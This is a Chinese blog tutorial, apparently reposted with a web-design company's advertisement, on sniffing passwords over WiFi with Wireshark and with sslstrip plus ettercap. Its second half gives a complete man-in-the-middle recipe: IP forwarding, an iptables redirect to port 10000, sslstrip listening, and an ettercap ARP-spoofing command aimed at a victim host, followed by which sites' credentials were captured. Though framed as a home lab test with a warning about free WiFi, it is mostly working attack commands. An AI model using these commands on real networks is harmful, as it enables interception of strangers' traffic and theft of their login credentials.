免费WiFi,wireshark抓包及sslstrip抓密码
因写了一段文字,就有这个抓包实验
成都创新互联自2013年创立以来,是专业互联网技术服务公司,拥有项目成都做网站、成都网站建设、成都外贸网站建设网站策划,项目实施与项目整合能力。我们以让每一个梦想脱颖而出为使命,1280元英吉沙做网站,已为上家服务,为英吉沙各地企业和个人服务,联系电话:18980820575
--------------------------------
话说:“现在我们一到某处,第一件事便是问有没有WiFi”。WiFi成为当下的热门,在公共场合人们最喜欢免费WiFi。但用着用着后不觉QQ被盗了。这WiFi便是诱饵,钓鱼人设了一个局,我们以为捡到便宜了,须不知,我们上勾了。QQ被盗,邮箱被浏览等等。免费虽好,请谨慎。
---------------------------------------
1.利用wireshark抓包测试51cto帐户及密码
环境的搭建
网络环境:网关:192.168.199.1;
测试主机:192.168.199.101,ubuntu13.04/wireshark;
测试目标:51cto.com
步骤
a.ubuntu 13.04安装wireshark
sudo apt-get wireshark
b. 新建wireshark组把普通用户加入其中,给wireshark使用权限
sudo groupadd wireshark //加组wireshark
sudo gpasswd -a zozlin wireshark //向组 GROUP 中添加用户 USER
sudo chgrp wireshark /usr/bin/dumpcap // 更抓包文件改组
sudo chmod 4755 /usr/bin/dumpcap //可执行权限
错误:
解决方法:sudo gedit /usr/share/wireshark/init.lua
倒数第二行原来为:dofile(DATA_DIR.."console.lua")改为--dofile(DATA_DIR.."console.lua")
c. sudo wireshark 选择网卡(在本机测试)
定过滤规则
ip.src==192.168.199.100 && http (源地址及http协议)
重点 (post application/x-www-form-urllencoded)
先试试天涯论坛和163邮件的密码,ssl己加密传输了。后51cto 发现是明文帐号密码
-----------------------------------------
2.利用sslstrip和ettercap突破ssl嗅探密码
环境的搭建
网络环境:网关:192.168.199.1;
***主机:192.168.199.101,ubuntu13.04/wireshark/sslstrip;
被***主机:192.168.199.105/103,虚拟机Windowsxp,IE6;
测试目标:51cto.com mail.163.com tianya.cn baidu.com
步骤
下载
http://www.thoughtcrime.org/software/sslstrip/
解压
tar -zxvf sslstrip-0.9.tar.gz
安装
sslstrip python setup.py install
打开ip_forword转发
echo “1”>/proc/sys/net/ipv4/ip_forward
使用Iptables过滤数据包 //通过iptables 把所有http数据导入到10000端口,我们用sslstrip监听10000端口,并得到我们想要的数据
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
sslstrip -l 10000
利用ettercap进行arp欺骗
ettercap –T –q –M arp:remote /192.168.199.103/ /192.168.199.1/
成果
mail.163.com 51cto.com 破
baidu.com 密码再次加密了
tianya.cn 未破
参考1.http://www.freebuf.com/articles/web/5929.html
2.http://www.blogjava.net/heyang/archive/2011/04/05/340330.html
3.http://www.linuxde.net/2011/11/2522.html
文章标题:免费WiFi,wireshark抓包及sslstrip抓密码
URL标题:http://myzitong.com/article/pejegc.html